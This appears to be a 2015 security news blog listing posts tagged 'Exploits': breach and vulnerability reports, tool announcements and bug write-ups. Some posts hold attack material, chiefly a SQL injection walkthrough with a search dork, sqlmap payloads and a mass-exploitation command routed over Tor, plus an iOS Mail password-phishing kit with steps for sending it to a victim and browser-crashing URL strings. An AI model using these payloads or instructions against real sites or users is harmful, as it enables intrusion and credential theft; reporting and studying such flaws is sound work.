Affichage des articles dont le libellé est Exploits. Afficher tous les articles
Affichage des articles dont le libellé est Exploits. Afficher tous les articles

13 Million Users Data Breached Of Free Web Hosting Company 000Webhost


13 Million Users Data Leaked With Plain Text Password Of Free Web Hosting Company 000Webhost.

000webhost is providing a free web hosting service for PHP and MySQL. The leaked data includes users names and e-mail addresses.

Troy Hunt explained in detail about this breach.
According to Forbes Report
Hunt discovered user accounts had their passwords reset, but without any direct notice to customers. When Hunt tried to login with his own email address, an auto-generated response told him his password had been reset by 000Webhost “for security reasons”, advising him to change his credentials before continuing. There was no public notification.

users started to complain on the site forum they could not access FTP servers used to host their website files.

Free WebHost said in Facebook Page

Hello,

We have witnessed a database breach on our main server.

What happened?
A hacker used an exploit in old PHP version to upload some files, gaining access to our systems. Although the whole database has been compromised, we are mostly concerned about the leaked client information.

What did we do about it?
First of all, we removed all illegally uploaded pages as soon as we became aware of the breach. Next, we changed all the passwords and increased their encryption to avoid such mishaps in the future. A thorough investigation to make sure the breach does not exist anymore is in progress.

What do you need to do?
As all the passwords have been changed to random values, you now need to reset them. DO NOT USE YOUR PREVIOUS PASSWORD. PLEASE ALSO CHANGE YOUR PASSWORDS IF YOU USED THE SAME PASSWORD ANYWHERE ELSE.

Client Area Password
Please visit Password Reminder tool at http://members.000webhost.com/forgot_password.php and enter your email address, the new password will be sent to your email. Afterwards, login to your account with the new password and manually set a new, secure password at http://members.000webhost.com/edit_your_details.php

Hosting Account Password
To reset the password for your hosting account (and FTP), visit "Change Account Password" section on control panel and enter a new password there.

Email Account Password
Email account passwords should be changed by visiting "Manage Email Accounts" section and clicking "Change password" for each email account.

MySQL User (Database) Password
MySQL user passwords are managed in "MySQL" section on control panel. In the "Action" field click the "Change Password" and set a new password there.

We apologize for this hassle but it has to be done to ensure your data is safe. We are going to upgrade our systems step by step and will be aiming to be super-careful in future.

Regards
000webhost Team "

Read more

by Malik korrich ~ mercredi 28 octobre 2015 0 commentaires

Another Zero Day Vulnerability Found In Adobe Flash


Another "Zero Day" Vulnerability Found In Adobe Flash

The researchers of TrendMicro found Zero day exploit in Adobe Flash Plugin. The Flash zero-day affects at latest version of Adobe Flash Player versions 19.0.0.185 and 19.0.0.207.

According to research Pawn Storm campaign are behind this attack said Trend Micro and they are targeting by sending Phishing Emails with attached exploit links. Suicide car bomb targets NATO troop convoy Kabul” said TrendMicro

“Syrian troops make gains as Putin defends air strikes”

“Israel launches airstrikes on targets in Gaza”

“Russia warns of response to reported US nuke buildup in Turkey, Europe”

“US military reports 75 US-trained rebels return Syria”

Adobe Affected Version by TrendMicro

How Can we Protect?

TrendMicro said that they sent report to Adobe. But still Adobe does not patched this vulnerability.
Read more

by Malik korrich ~ mercredi 14 octobre 2015 0 commentaires

Your Chrome Gets Crash By Using These String Code URL


Your Chrome Gets Crash By Using These String Code URL  

We have tested these 16 characters strings and it still works on Windows and Mac.

This security issue was found by Andris Atteka. By mouse over on link its enough for your chrome Crash.

Security Flaw Strings are:

http://a/%%30%30
file:///%%300
http://biome3d.com/%%30%30

He said in the blog,

"Recently I reported a crash bug in Google Chrome (issue #533361). This issue reminded me of the recent Skype vulnerability - both occur with simple URL strings. So how can you crash Google Chrome? By adding a NULL char in the URL string:

http://biome3d.com/%%30%30

Unfortunately no reward was awarded as this was deemed to be only a DOS vulnerability. Anyway, making secure software is much harder than finding issues in it. Thanks Google."

Hope Google will be fixed this issue soon.
Read more

by Malik korrich ~ lundi 21 septembre 2015 0 commentaires

Are You Using WhatsApp Web? Your Account Can Be Hack


Are You Using WhatsApp Web? Your Account Can Be Hack!

The major security flaw on WhatsApp web. The company recently announced 900 million users and at least 200 million are using Whatsapp Web interface. 

WhatsApp Web allows users to view any type of media or attachment that can be sent or viewed by the mobile platform/application. This includes images, videos, audio files, locations and contact cards. This vulnerability found by Checkpoint security researchers Kasif Dekel.

Which exploit the WhatsApp Web logic and allow attackers to trick victims into executing arbitrary code on their machines in a new and sophisticated way. All an attacker needed to do to exploit the vulnerability was to send a user a seemingly innocent vCard containing malicious code. Once opened, the alleged contact is revealed to be an executable file, further compromising computers by distributing bots, ransomware, RATs, and other malwares.

Kasif found that by manually intercepting and crafting XMPP requests to the WhatsApp servers, it was possible to control the file extension of the contact card file.

He changed the file in .BAT and send to victim. Once the victim download the file code and run on the computer then malicious code gets injected and run

  • Take complete control over the target machine
  • Monitor user's activities
  • Use the target machine to spread viruses



  • NUMBER/GROUPID: the victim’s number or group ID
  • ID: the message ID
  • TIMESTAMP: the timestamp of the sender device
  • FILENAME: the VCARD file name, .exe
  • FILEDATA: the raw data of the file

This vulnerability fixed in the week. 

  • On August 21, 2015 – Vulnerability disclosed to the WhatsApp security team. 
  • August 27, 2015 – WhatsApp rolls out fixed web clients (v0.1.4481)

WhatsApp security team has verified and acknowledged the vulnerability and has rolled out an update to fix the issue in its web clients (v0.1.4481).

Source: CheckPoint
Read more

by Malik korrich ~ mercredi 9 septembre 2015 0 commentaires

SONAR: A Framework For Identifying And Launching Exploits Against Internal Network Hosts


SONAR: A Framework For Identifying And Launching Exploits Against Internal Network Hosts

Works via WebRTC IP scanning combined with external resource fingerprinting.

How does it work?

Upon loading the sonar payload in a modern web browser the following will happen:
  • sonar will use WebRTC to scan the internal network for live hosts.
  • If a live host is found, sonar begins to attempt to fingerprint the host by linking to it via and and hooking the onload event. If the expected resources load successfully it will trigger the pre-set JavaScript callback to start the user-supplied exploit.
  • If the user changes networks, sonar starts the process all over again on the newly joined network.

Fingerprints

Sonar works off of a database of fingerprints. A fingerprint is simply a list of known resources on a device that can be linked to and detected via onload. Examples of this include images, CSS stylesheets, and even external JavaScript.

An example fingerprint database can be seen below:

var fingerprints = [
    {
        'name': "ASUS RT-N66U",
        'fingerprints': ["/images/New_ui/asustitle.png","/images/loading.gif","/images/alertImg.png","/images/New_ui/networkmap/line_one.png","/images/New_ui/networkmap/lock.png","/images/New_ui/networkmap/line_two.png","/index_style.css","/form_style.css","/NM_style.css","/other.css"],
        'callback': function( ip ) {
            // Insert exploit here
        },
    },
    {
        'name': "Linksys WRT54G",
        'fingerprints': ["/UILinksys.gif","/UI_10.gif","/UI_07.gif","/UI_06.gif","/UI_03.gif","/UI_02.gif","/UI_Cisco.gif","/style.css"],
        'callback': function( ip ) {
            // Insert exploit here
        },
    },
]

The above database contains fingerprints for two devices, the ASUS RT-N66U WiFi router and the Linksys WRT54G WiFi router.

Each database entry has the following:

  • name: A field to identify what device the fingerprint is for. This could be something like HP Officejet 4500 printer or Linksys WRT54G Router.
  • fingerprints: This is an array of relative links to resources such as CSS stylesheets, images, or even JavaScript files. If you expect these resources to be on a non-standard port such as 8080, set the resource with the port included: :8080/unique.css. Keep in mind using external resources with active content such as JavaScript is dangerous as it can interrupt the regular flow of execution.
  • callback: If all of these resources are found to exist on the enumerated host then the callback function is called with a single argument of the device's IP address.
  • By creating your own fingerprints you can build custom exploits that will be launched against internal devices once they are detected by sonar. Common exploits include things such as Cross-site Request Forgery (CSRF), Cross-site Scripting (XSS), etc. The idea being that you can use these vulnerabilities to do things such as modifying router DNS configurations, dumping files from an internal fileserver, and more.

For an easier way to create fingerprints, see the following Chrome extension which generates fingerprint template code automatically for the page you're on:

Click Here to Install Chrome Extension



What can be done using sonar?

By using sonar a pentesting team can build web exploits against things such as internal logging servers, routers, printers, VOIP phones, and more. Due to internal networks often being less guarded, attacks such as CSRF and XSS can be powerful to take over the configurations of devices on a hosts internal network.

Download
Read more

by Malik korrich ~ lundi 24 août 2015 0 commentaires

PortDog: Port Scanning Tool In Python


PortDog: Port Scanning Tool In Python

PortDog is a network anomaly detector aimed to detect port scanning techniques. It is entirely written in python and has easy-to-use interface. 

It was tested on Ubuntu 15. Please note that, it is not working on Windows OS due to suffering from capturing RAW packets.I am working on to write this script to work both platforms. In future , I'm thinking about adding firewall options that could block malicious attempts. It is using Raw packets for analysis. For this reason, please ensure that you have run this script from privileged session.


Usage:

sudo python portdog.py -t time_for_sniff_in_minutes

For example, if you want to detect for 5 minutes use:

sudo python portdog.py -t 5

For infinite detection use:

sudo python portdog.py -t 0

If you want to get list of scanned ports , press CTRL+C to get port list at runtime (If scan was happened).


Download
Read more

by Malik korrich ~ vendredi 14 août 2015 0 commentaires

Organizations Need To Be More Concerned About Their Security

Organizations Need To Be More Concerned About Their Security.

Nothing is secure! Yes, you heard it right. Today we point of some recent hacks.

From a top range of cars to high potential planes, all have been found vulnerable many times.

SuperCar Tesla S gets Vulnerable
Starting from the recent hack of Tesla Model S car, two researchers have found a vulnerability in the internal network of Tesla’s dashboard and it was successfully penetrated with the help of software command and they could even plant a trojan into the Model S’ network and remotely disconnect its engine from the dashboard.

America Airlines And Sabre Systems
Now the same thing happened with the American Airlines too, Chinese Hackers have breached the American Airlines and Sabre Systems and got access to hundreds of airlines reservations and thousands of hotel’s data but evidence have not been found yet.

Security Breach In Pentagon Computers
Another big breach was Pentagon Access, Russian Hackers got access to Pentagon email systems and affected 4,000 Joint Chief’s of Staff Personnel (both military and civilian) and now the system has been shutdown for around two weeks.

Skateboards Also Compromised
And not only this but your Skateboards are also being compromised. Recently, two security researchers Healey and Mike Ryan developed an exploit called FacePlant which can seize the device and take over the control of electric Skateboards and they have also presented their findings in DEFCON Conference held at Las Vegas.

Ashley Madison Dating Website Hacked
Ashley Madison Website Hacked: Hackers Want To Release 37 Million Users Data. Ashley Madison is and undertaking site to the online personals & dating destination for easygoing experiences, wedded dating, attentive experiences and extramarital issues. 

Hacking Team Got Hacked
Italian Surveillance Company "HackingTeam" Got Hacked, 400GBs Data Leaked Online! An Italian company that sells spying tools to government and law enforcement agencies has been hacked with 400GB data of internal documents, source code and emails. -
Read more

by Malik korrich ~ lundi 10 août 2015 0 commentaires

KdExploitMe: A Kernel Driver To Practice Writing Exploits


KdExploitMe: A kernel driver to practice writing exploits against, as well as some example exploits using public techniques.

The intent of this driver is to educate security testers on how memory corruption issues in Windows kernel drivers can be exploited. 

Knowing how to exploit security issues allows security testers to prove that bugs are exploitable which can be used to convince developers to fix bugs. While these techniques can be used for evil, this driver in the hopes that you will use this knowledge for good.

Download
Read more

by Malik korrich ~ jeudi 6 août 2015 0 commentaires

Wordpress Fixes Security Bugs And Updated New 4.2.4 Version


Wordpress Fixes Security Bugs And Updated New 4.2.4 Version.

On Wordpress many vulnerabilities have found by security researchers and the good thing is Wordpress has been patched these vulnerability as vary on time and comes with new updated version.

This 4.2.4 version release addresses with six issues, including three cross-site scripting vulnerabilities and a potential SQL injection that could be used to compromise a site.

WordPress 4.2.4 fixes three cross-site scripting vulnerabilities and a potential SQL injection that could be used to compromise a site (CVE-2015-2213).

It also includes a fix for a potential timing side-channel attack and prevents an attacker from locking a post from being edited.

To download WordPress 4.2.4, update automatically from the Dashboard > Updates menu in your site's admin area

Download Wordpress
Read more

by Malik korrich ~ mercredi 5 août 2015 0 commentaires

Untethered Jailbreak Your iOS 8.4 Devices Including MAC Version Available


Untethered Jailbreak Your iOS 8.4 Devices Including MAC Version Available

The chinese website TaiG released jailbreak for Mac latest version iOS 8.4 jailbreak for iOS 8.4. iPhone 6, 6 Plus, 5s, 5c, 5, 4s, all iPads and iPod touches are supported. 

What is Jailbreak?
iOS jailbreaking is the process of removing the limitations on Apple devices running the iOS operating system through the use of software and hardware exploits – such devices include the iPhone, iPod touch, iPad, and second generation Apple TV. Jailbreaking permits root access to the iOS operating system, allowing the download of additional applications, extensions, and themes that are unavailable through the official Apple App Store.

How can you Jailbreak?

  • Download and install TaiG
  • Turn off your passcode (Settings > Passcode > Turn Passcode Off) and Find My iPhone (Settings > iCloud > Find My iPhone)
  • Plug in your phone to your computer, close iTunes (if it opened) and open the TaiG app
  • Start to jailbreak. Open TaiG Jailbreak Tool, and have your device connected to your computer.
  • Wait for TaiG to recognize your device, then uncheck the 3K assistant option
  • Click Start and wait for the software to jailbreak your device.

-> Backup your data before Jailbreak

TaiG Jailbreak V2.4.3 supports iOS 8.1.3-iOS 8.4 untethered jailbreak. Currently iOS 8.4 is relatively stable. So we strongly recommend you to update your device to iOS 8.4 with TaiG Pro before jailbreak.

Download Taig Jailbreak Tool

Read more

by Malik korrich ~ 0 commentaires

Malvertising Hits 10 Million In 10 Days You Might Be Under Attack While Surfing The Web




Malvertising Hits 10 Million In 10 Days. 
You Might Be Under Attack While Surfing The Web.

Even many of the advertising companies didn't know that they are running Malware ads.

How its happen?
When Advertiser contact to advertising companies. Most of the companies didn't check advertising scripts, where users attach script in back-end. Websites are regularly casualties of malvertising and its infect to web visitors since attacker using these tricks for their malware inside of commercials.

Malvertising Example 1:



Malvertising Example 2:



According to Cyphort,

Malvertising attack is still going strong, using SSL redirector at  https://ads.us.e-planning.net .
In the last 10 days, Cyphort Labs found many more infected domains – they are listed below. Please refrain going to these sites as they are dangerous.  

We have notified e-planning.net about this issue and they are actively working to resolve it. At least 10 million people have visited these websites and were potentially exposed to the Angler exploit kit in the last 10 days according to our estimates and data from Similar Web.


How can we save from Malware Ads?

By using AdBlock Plus .

  • Surf the web without annoying ads!
  • Can block tracking, malware domains, banners, pop-ups and video ads - even on Facebook and YouTube
  • Unobtrusive ads aren't being blocked in order to support websites (configurable)
  • It's free! (GPLv3)


Read more

by Malik korrich ~ mardi 28 juillet 2015 0 commentaires

Android Phones Can Be Hacked With Just A Text Message




     Android Phones Can Be Hacked With Just A Text Message


Yes, you heard it right!


About 990 Million Android Phones could be hacked with just a simple text. This is one of the biggest smartphone flaw ever found.


A Security Research Company ‘Zimperium’ claims to have found a bug to tap into the world’s most popular mobile platform. This hack relies on flaw found in Stagefright, a core android component and a media playback service that’s built into Android which is used to process, record and play the multimedia files.

This security hole puts 990 million Android devices at risk. And that is truly a huge number of smartphones. In 2014, more than 1 billion Android phones shipped throughout the world, in accordance with Researcher Strategy Analytics, which expects the number to go up in 2015 and beyond. Zimperium termed Stagefright the "Mother of all Android vulnerabilities". In this attack, the victim would not need to do any mistake like opening an attachment or download a file that's corrupt. The malicious code would take over instantly, the moment you receive a text message. You may not even see anything.

Once the attackers get in, Drake says, they would be able to do anything — may be copy or delete the data, take the control of your camera and microphone to monitor your every move. "It's really up to their imagination what they do once they get in," he said.

Joshua Drake, VP of platform research and exploitation of a mobile security firm Zimperium, reported the flaw to Google earlier this year, but he said that most manufacturers have not made fixes available to the user base till date. 

All the bugs are provided with CVE numbers, used to identify the severe vulnerabilities. They include CVE-2015-1538, CVE-2015-1539, CVE-2015-3824, CVE-2015-3826, CVE-2015-3827, CVE-2015-3828, CVE-2015-3829. When the disclosure lands today, security researchers and attackers could have enough information to get cracking on exploits. Manufacturers have been requested to bring in patches as soon as possible to protect their consumers against this malicious flaw.

Even more information will be disclosed by Drake who deserves much credit for his work in addressing and fixing the issues, in full at the Black Hat and Defcon security events going to taking place in Las Vegas next week.


Read more

by Malik korrich ~ lundi 27 juillet 2015 0 commentaires

Security Hole in Apple OS X Privilege Escalation Bug Found



Security Hole in Apple OS X, Privilege Escalation Bug Found By Security Researcher Stephan Esser.

Esser said the vulnerability is present in both the current 10.10.4 (Yosemite) version of OS X and the current beta version of 10.10.5. 

Significantly, the present beta variant of 10.11 is free of the flaw, an evidence that Apple designers might as of now aware of the vulnerability. It wouldn't be astounding for the fix to discover its way into an incremental redesign to OS X released in the coming weeks.

Its the type of security hole attackers regularly exploit to bypass security protections built into modern operating systems and applications.

Esser explained in the blog post,

When Apple changed the dynamic linker code for OS X 10.10 to support the new DYLD_PRINT_TO_FILE environment variable they added the following code directly to the _main function of dyld. As you can see from this code the value of the environment variable is directly used as filename for the opened or created logging file.

const char* loggingPath = _simple_getenv(envp, "DYLD_PRINT_TO_FILE");
if ( loggingPath != NULL ) {
        int fd = open(loggingPath, O_WRONLY | O_CREAT | O_APPEND, 0644);
        if ( fd != -1 ) {
                sLogfile = fd;
                sLogToFile = true;
        }
        else {
                dyld::log("dyld: could not open DYLD_PRINT_TO_FILE='%s', errno=%d\n", loggingPath, errno);
        }
}


The problem with this code is that it does not come with any safeguards that are required when adding new environment variables to the dynamic linker. Normally for security reasons the dynamic linker should reject all environment variables passed to it in case of restricted files. This is automatically handled when new environment variables are added to the process DyldEnvironmentVariable() function. However in the DYLD_PRINT_TO_FILE case the code was directly added to the _main function of dyld.

Notwithstanding that it includes a relief against a typical trap to evade O_APPEND limitations on document descriptors.

How can we protect?

Before going into the exploitation of this problem please be reminded that because it will likely take months for Apple to react to this issue we released a kernel extension that protects from this vulnerability by stopping all DYLD_ environment variables form being recognized by the dynamic linker for SUID root binaries. In addition to that it adds a mitigation against a common trick to circumvent O_APPEND restrictions on file descriptors.

Essar tweeted:




If you want to fix this vulnerability before apple new update then here you can. Security researcher Esser explained to fix this vulnerability on GitHub.

SUIDGuard - A kernel extension adding mitigations to protect SUID/SGID binaries

SUIDGuard is a TrustedBSD kernel driver that implements several mitigations to protects against weaknesses usually involving SUID/SGID binaries.

  • Protects SUID/SGID root binaries from DYLD_ environment variables by overwriting the string DYLD_ with XYLD_
  • Protects the O_APPEND flag usually used when opening e.g. logfiles from being disabled by someone with credentials that are different from those used to open the file
  • Tested with OS X Yosemite 10.10.4.


Read more

by Malik korrich ~ jeudi 23 juillet 2015 0 commentaires

Firefox Blocks Adobe Flash Player Plugin Due To Unpatched 3rd Zero Day Vulnerability




Firefox Blocks Adobe Flash Player Plugin Due To Unpatched 3rd Zero Day Vulnerability.

Some of the places user didn't see the videos due to block. Exploits for these vulnerabilities were found in the information taken from HackingTeam in the assault revealed a week ago.

Adobe expected to patch these flash Zero days in this week, but at the meantime Adobe disabled all versions of plugin.

Adobe released 18.0.0.209 update version for flash player plugin today

In the Mozilla Statement,
"All versions of Adobe’s Flash Player plugin are currently deactivated by default, until Adobe releases an updated version to address known critical security issues."

Last week we reported Hacking Team was hacked and 400GBs Data Leaked. These zero days comes out from these leaks.

Firefox officially Tweeted,


New Facebook Chief Security Officer (CSO) Alex Stamos tweeted,


In the Statement of Adobe,

"Security Advisory for Adobe Flash Player
Release date: July 10, 2015

Last Updated: July 12, 2015
Vulnerability identifier: APSA15-04

CVE number: CVE-2015-5122, CVE-2015-5123

Platform: Windows, Macintosh and Linux

Summary:
Critical vulnerabilities (CVE-2015-5122, CVE-2015-5123) have been identified in Adobe Flash Player 18.0.0.204 and earlier versions for Windows, Macintosh and Linux. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system.  

Adobe is aware of reports that exploits targeting these vulnerabilities have been published publicly. Adobe expects to make updates available during the week of July 12, 2015."

By playing any flash content in Firefox, top of the browser windows can read 

"Firefox has presented the unsafe plugin 'Adobe Flash' from running on the target URL."


Read more

by Malik korrich ~ mardi 14 juillet 2015 0 commentaires

Hack iOS Mail App: Exploit Working [Video]


Hack iOS Mail App Credentials: Exploit Working [Video]  
iOS 8.3 Mail app injection kit!

This injection kit pawns every iOS 8.3 Mail app and  it is developed by Jan Soucek. He is exploiting a bug of iOS Mail app that lets hackers send fake prompts to access the password information of the user. So beware of the prompts if you are asked to enter the password and think twice giving your iOS credentials.

Back in January 2015 Jan stumbled upon a bug in iOS's mail client, resulting in HTML tag in e-mail messages not being ignored.

This bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password "collector" using simple HTML and CSS.

It was filed under Radar #19479280 back in January, but the fix was not delivered in any of the iOS updates following 8.1.2. Therefore I decided to publish the proof of concept code here.

Demo:


Usage

  • Edit the e-mail address you would like to use for password collection in framework.php
  • Upload index.php, framework.php and mydata.txt to your server
  • Send an e-mail containing HTML code from e-mail.html to the research subject
  • Don't forget to change the modal-username GET parameter value to the e-mail address of the recipient
  • You can use https://putsmail.com for testing purposes


Credits
Framework7: Vladimir Kharlampidi (http://www.idangero.us/framework7) - Framework7's CSS code was used for the login dialog styling

License
MIT

Notes
The code detects that the research subject has already visited the page in the past (using cookies) and it stops displaying the password prompt to reduce suspicion.

The e-mail address and password are submitted via GET to framework.php, which then saves them to the mydata.txt file, sends them out via e-mail to the specified "collector" e-mail address and then returns the research subject back to Mail.app using redirect to message://dummy.

The password field has autofocus enabled. We then use focus detection to hide the login dialog once the password field loses its focus (e.g. after the subject clicks on OK and submits the password).

Download
Read more

by Malik korrich ~ mercredi 10 juin 2015 0 commentaires

Oops! Bug In Skype Crashed By Send Simple Word


Oops! Bug In Skype | Crashed By Send Simple Word

I just sent the message to my friend
As you can see in image i type "http://:" [without quote] and send. After enter it shown the pop up with message

"Skype has stopped working".


This is the Bug in Skype and Skype confirmed the bug.  If you are current using Skype you can also check the same.

Now Skype officially said that this bug has been fixed now.

Solution:
Just install the Latest Version from http://www.skype.com/download For Android and iOS for to be fixed this Bug on your OS platform.
Read more

by Malik korrich ~ mercredi 3 juin 2015 0 commentaires

Router Exploitation Toolkit - REXT


Router Exploitation Toolkit - REXT
Small toolkit for easy creation and usage of various python scripts that work with embedded devices.


  • core - contains most of toolkits basic functions
  • databases - contains databases, like default credentials etc.
  • interface - contains code that is being used for the creation and manipulation with interface
  • modules - contains structure of modules, that can be loaded, every module contains vendor specific sub-modules where scripts are stored.
  1. decryptors
  2. exploits
  3. harvesters
  4. misc
  5. scanners
  • output - output goes here
  • This is still heavy work-in progress


Requirements
Trying to keep the requirements minimal:

httplib2

License
This software is licensed under GNU GPL v3.

Download
Read more

by Malik korrich ~ 0 commentaires

Exploring CMS With SQLMap + INURL BR Mass


Exploring CMS With SQLMap + INURL BR Mass

In this article we explore one SQLI pattern in the CMS one of the company. Let's use sqlmap for SQL injection and Scanner INURL to seek mass targets.

For those not familiar with this tool was developed by a HackersOnlineClub member (Cleiton Pinheiro). In order to automate detailed filters with search engines using special digital & security search operators.

[+] Dork:      
intext:"Aadi" & inurl:"page.php?id="

[+] POC:      
http://www.target.com/page.php?id=1+XPL_SQLI

[+] Exploit:
DEBUGsqlmap  

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1630=1630 AND 'DBoa'='DBoa
Vector: AND [INFERENCE]

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 3932 FROM(SELECT COUNT(*),CONCAT(0x717a627671,(SELECT (ELT(3932=3932,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wUln'='wUln
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(10)))HrzP) AND 'jmET'='jmET
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a627671,0x465169724a72556d4e4f,0x716a6b7071),NULL-- 

    Vector:  UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL-- 

[+] Login Page: 
http://www.test.com/admin

[+] EXPLORING WITH SQLMAP:
sqlmap.py -u 'http://www.target.com/page.php?id=1' -p id --random-agent --beep --level 3 --risk 2--threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch

OUTPUT PRINT:
[+] EXPLORING WITH SQLMAP: sqlmap.py -u 'http://www.target.com/page.php?id=1' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch OUTPUT PRINT:

[+] EXPLORING WITH MASS INURLBR:
php inurlbr.php --dork 'intext:"Aadi" & inurl:"page.php?id="' -s aadi.txt  -q 1,6 --exploit-get "?&id=1%270x27" --command-vul "sqlmap.py -u '_TARGETFULL_' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch"

OUTPUT PRINT:
[+] EXPLORING WITH MASS INURLBR: php inurlbr.php --dork 'intext:


[+] Discoverer Author: Killer~X
[+] EMAIL:             M_ox@hotmail.com
[+] FACEBOOK:          http://www.fb.com/xXalreshyXx
[+] ASK:               http://www.ask.fm/ALRESHY

Source:
http://www.exploit4arab.net/exploits/1486
Read more

by Malik korrich ~ dimanche 10 mai 2015 0 commentaires

PixieWPS Offline Bruteforce WPS Pin Exploiting Tool


PixieWPS Offline Bruteforce WPS Pin Exploiting Tool

Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some APs (pixie dust attack). 

It is meant for educational purposes only. All credits for the research go to Dominique Bongard.

DEPENDENCIES
Pixiewps requires libssl. To install it:

    sudo apt-get install libssl-dev

INSTALLATION
Pixiewps can be built and installed by running:

    ~/pixiewps$ cd src
    ~/pixiewps/src$ make
    ~/pixiewps/src$ sudo make install

USAGE

Usage: pixiewps

 Required Arguments:

    -e, --pke      : Enrollee public key
    -r, --pkr      : Registrar public key
    -s, --e-hash1  : E-Hash1
    -z, --e-hash2  : E-Hash2
    -a, --authkey  : Key used in HMAC SHA-256

 Optional Arguments:

    -n, --e-nonce  : Enrollee nonce
    -S, --dh-small : Small Diffie-Hellman keys (--pkr not needed)

    -h, --help     : Display this usage screen

Download
Read more

by Malik korrich ~ lundi 20 avril 2015 0 commentaires

URL Redirection Vulnerability On PayPal Developers Website



URL Redirection Vulnerability On PayPal Developers Website.

Hi, my name is Rui Silva and I’m a security researcher from Portugal with 17 years old. I will explain how I found one url redirection vulnerability on PayPal Sub domain developer.paypal.com !

Description:
[#] Title           : URL Redirection Vulnerability on PayPal Developers
[#] Status        :  Unfixed/Duplicate
[#] Severity     :  Medium
[#] Works on   :  Chrome Version 41.0.2272.118 m

POC:

Steps to reproduce:
First signup on PayPal Website.
After this go to: developer.paypal.com/developer/login?successRedirect=
On sucessRedirect= add http:/google.pt

Final URL: 
developer.paypal.com/developer/login?successRedirect=http:/google.pt

Now open this url on a tab on chrome browser and click enter.
After click enter signin on your paypal account and you will be redirected to google.pt website.

After found I report this to PayPal Security Team.
One week later they reply me.

PayPal Reply:



And after wait… 1 or 2 hours later they reply me again

Reply:





Thanks to all for your support!
I hope you enjoyed the article

Video:


HOC Team is congratulate to Rui Silva for Found the Bug.
Read more

by Malik korrich ~ samedi 11 avril 2015 0 commentaires

« Articles plus anciens